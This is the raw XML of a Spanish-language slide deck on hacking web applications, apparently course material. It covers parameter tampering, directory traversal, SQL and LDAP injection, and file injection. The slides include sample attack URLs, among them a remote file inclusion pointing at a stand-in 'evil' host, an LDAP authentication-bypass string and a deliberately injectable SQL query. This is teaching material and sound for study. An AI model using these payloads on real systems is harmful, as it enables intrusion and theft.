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410" r:id="rId85"/>
    <p:sldId id="409" r:id="rId86"/>
    <p:sldId id="411" r:id="rId87"/>
    <p:sldId id="398" r:id="rId88"/>
    <p:sldId id="412" r:id="rId89"/>
    <p:sldId id="399" r:id="rId90"/>
    <p:sldId id="413" r:id="rId91"/>
    <p:sldId id="400" r:id="rId92"/>
    <p:sldId id="414" r:id="rId93"/>
    <p:sldId id="401" r:id="rId94"/>
    <p:sldId id="415" r:id="rId95"/>
    <p:sldId id="402" r:id="rId96"/>
    <p:sldId id="416" r:id="rId97"/>
    <p:sldId id="403" r:id="rId98"/>
    <p:sldId id="417" r:id="rId99"/>
    <p:sldId id="405" r:id="rId100"/>
    <p:sldId id="418" r:id="rId101"/>
    <p:sldId id="406" r:id="rId102"/>
    <p:sldId id="419" r:id="rId103"/>
    <p:sldId id="407" r:id="rId104"/>
    <p:sldId id="408" r:id="rId105"/>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13. Hackeando Aplicaciones Web</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42820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a las aplicaciones Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Hijacking de autenticación. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ataques a los servicios Web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Manipulación oculta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Re direccionamiento no válido.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ataque de fijación de sesión.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejecución de archivos maliciosos.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1320771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Testear Servicios Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16249734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346325" y="491718"/>
            <a:ext cx="4451350" cy="5874563"/>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4917369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Testear Ajax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36472318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558869" y="1412776"/>
            <a:ext cx="6291518" cy="3987140"/>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4043832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368795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Entradas no válidas</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Los defectos de validación de entradas se refiere a una vulnerabilidad de aplicación Web donde la entrada desde el cliente no es validada antes de ser procesada por las aplicaciones Web y los servidores back-end. Un atacante explota una defecto de validación de entrada para realizar cross-site scripting, buffer overflow, ataques de inyección, etc. eso resulta en robo de datos y mal funcionamiento del sistema.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Ej.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Browser Post Request: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://juggyboy.com/login.aspx?user=jasons@pass=springfield </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263594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Consulta Modificada</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string sql = "select * from Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user = '" + User.Text + "' and pwd='" + Password.Text + "'"r</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367477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Manipulación de parámetros/formularios</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Un ataque de manipulación de parámetro implica la manipulación de parámetros intercambiados entre el cliente y el servidor para modificar datos de la aplicación como credenciales de usuarios y permisos, precios, cantidad de productos. Un ataque de manipulación de parámetros explota vulnerabilidades en integridad y mecanismos de validación lógica que pueden resultar en XSS, SQL Injection, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414904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Manipulación de parámetros/formularios</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Manipulación de datos URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.juggybank.com/custo.asp?profile=21&amp;debit=2500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>por este</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.juggybank.com/custo.asp?profile=82&amp;debit=1500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Otros parámetros pueden ser cambiados incluyendo atributos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.juggybank.com/stat.asp?pg=531%status=view</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.juggybank.com/stat.asp?pg=531%status=delete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87752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Directory Traversal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1600200"/>
            <a:ext cx="8640960" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Permite a los atacantes acceder a directorios restringidos incluyendo el código fuente de la aplicación, configuración y archivos críticos del sistema, y ejecutar comandos desde fuera del directorio raíz del Servidor Web. Los atacantes pueden manipular variables de archivos referencia con secuencias "punto-punto-slash(../)"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.juggyboy.com/process.aspx=../../../../algun directorio/algún archivo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250170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Mala configuración de seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2700" dirty="0"/>
              <a:t>Cualquier configuración por defecto o cualquier aplicación incorrecta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2700" dirty="0"/>
              <a:t>Fácil Explotación: Utilizando vulnerabilidades de mala configuración, los atacantes pueden obtener acceso no autorizado a las cuentas por defecto, leer páginas no utilizadas, explotar defectos no parchados, leer o escribir archivos y directorios no protegidos, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2700" dirty="0"/>
              <a:t>Predominio común: La mala configuración puede ocurrir en cualquier nivel de la pila de aplicación, incluyendo la plataforma, servidor Web, framework, y código a medida.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189415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Mala configuración de seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejemplo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>La consola de administración del servidor es automáticamente instalada y no quitada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Las cuentas por defecto no son cambiadas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>El atacante descubre páginas de administración estándar en el servidor, logs con las contraseñas por defecto y se hace cargo.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204833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Inyección de fallas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>1. Son vulnerabilidades en las aplicaciones Web que a los datos no confiados ser interpretados y ejecutados como parte de un comando o consulta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>2. Loas atacantes inyectan fallas construyendo comandos o consultas maliciosa que resultan en pérdida o corrupción de datos, falta de responsabilidad, o denegación de acceso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>3. Las fallas inyectadas son prevalentes en código heredado, a menudo encontrado en SQL, LDAP, y consultas XPath, etc. y puede ser descubierto fácilmente por escaners de vulnerabilidad de aplicaciones y fuzzers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74696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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" err="1"/>
              <a:t>Injection</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Utiliza una serie de consultas SQL maliciosas para manipular directamente la base de datos. Un atacante puede usar una aplicación web vulnerable burlar las medidas de seguridad normales y obtener acceso directo a datos de valor. Los ataques SQL Injection pueden además ser ejecutados desde la barra de direcciones, desde dentro de los campos de aplicación y a través de consultas y búsquedas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15808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Introducción</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Las aplicaciones son generadas en el servidor o bien pueden ser ejecutadas por script dinámicamente en el navegador del cliente. Existen varios ataques de vulnerabilidad como SQL Injection, cross-site scripting, session hijack, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105187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Ataques de inyección de comandos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Ataques de inyección Shell: Un atacante intenta elaborar una cadena de entrada para obtener acceso shell a un servidor web. La inyección de funciones shell incluye </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system(), StartProcess(), java.lang.Runtime.exec(), System.díagnostics.Process.Start() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>y APIs similares.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>HTML Embedding: Este tipo de ataque es utilizado para desfigurar virtualmente un sitio. Utilizando este ataque, un atacante agrega contenido HTML extra para vulnerar una aplicación web. En estos ataques, la entrada del usuario a una secuencia de comandos web se coloca en la salida HTML.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356284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de inyección de comandos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>File Injection: El atacante explota esta vulnerabilidad e inyecta código malicioso dentro de los archivos del sistema:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289202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¿Qué es inyección LDAP?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Esta técnica es utilizada para tomar ventaja de vulnerabilidades de entrada de aplicaciones web no validadas para pasar los filtros LDAP utilizados para buscar Servicios de Directorio para obtener acceso directo a las bases de datos detrás del árbol LDAP.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373393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¿Como trabaja la inyección LDAP?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>1. Es similar a los ataques SQL Injection pero explota parámetros de usuario para generar una consulta LDAP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>2. Para probar que una aplicación es vulnerable a inyección de código LDAP, enviar una consulta al servidor que genera una entrada válida. Si el Servidor LDAP regresa un error, puede ser explotado con técnicas de inyección de código.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93690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trabaja la inyección LDAP?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Ej: Si un atacante entra un nombre de usuario válido "juggyboy" e inyecta </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>juggyboy}{&amp;}} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>luego la cadena URL se convierte en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{&amp;{USER=juggyboy}{&amp;}}{Pass=blah}}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Solo el primer filtro es procesado por el servidor LDAP, solo la consulta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;{USER=juggyboy}{&amp;}} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>es procesada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Esta consulta siempre será </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" u="sng" dirty="0"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> y el atacante inicia sesión en el sistema sin una contraseña válida.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2191742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de manipulación de campo escondido</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1. Cuando un usuario hace una selección en una página HTML, la selección es típicamente almacenada como valores de campo de formulario y enviados a la aplicación como una solicitud HTTP (GET o POST).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>2. HTML también puede almacenar valores de campos como campos escondidos, que no son renderizados a la pantalla por el navegador, pero son recolectados y enviados como parámetros durante las presentaciones del formulario.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>3. Los atacantes pueden examinar el código HTML de la página y cambiar los valores del campo escondido para poder enviar solicitudes al servidor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
